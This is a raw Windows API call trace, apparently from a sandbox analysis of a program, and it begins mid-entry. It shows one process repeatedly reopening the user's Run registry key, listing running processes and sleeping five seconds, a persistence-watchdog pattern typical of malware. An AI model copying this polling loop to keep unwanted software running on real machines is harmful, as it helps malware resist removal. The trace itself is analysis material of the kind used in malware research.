TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.761] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.761] NtClose (Handle=0x154) returned 0x0 [0178.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.765] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.777] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.777] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.777] NtClose (Handle=0x154) returned 0x0 [0178.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.780] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.792] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.792] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.792] NtClose (Handle=0x154) returned 0x0 [0178.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.797] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.811] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.811] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.811] NtClose (Handle=0x154) returned 0x0 [0178.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.815] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.823] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.823] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.823] NtClose (Handle=0x154) returned 0x0 [0178.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.827] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.839] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.839] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.839] NtClose (Handle=0x154) returned 0x0 [0178.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.842] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.854] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.855] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.855] NtClose (Handle=0x154) returned 0x0 [0178.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.859] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.870] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.870] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.870] NtClose (Handle=0x154) returned 0x0 [0178.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.874] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.887] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.887] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.887] NtClose (Handle=0x154) returned 0x0 [0178.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.891] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.901] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.901] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.901] NtClose (Handle=0x154) returned 0x0 [0178.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.917] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.917] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.917] NtClose (Handle=0x154) returned 0x0 [0178.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.921] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.932] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.932] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.932] NtClose (Handle=0x154) returned 0x0 [0178.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.948] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.948] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.948] NtClose (Handle=0x154) returned 0x0 [0178.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.953] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.963] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.964] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.964] NtClose (Handle=0x154) returned 0x0 [0178.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, 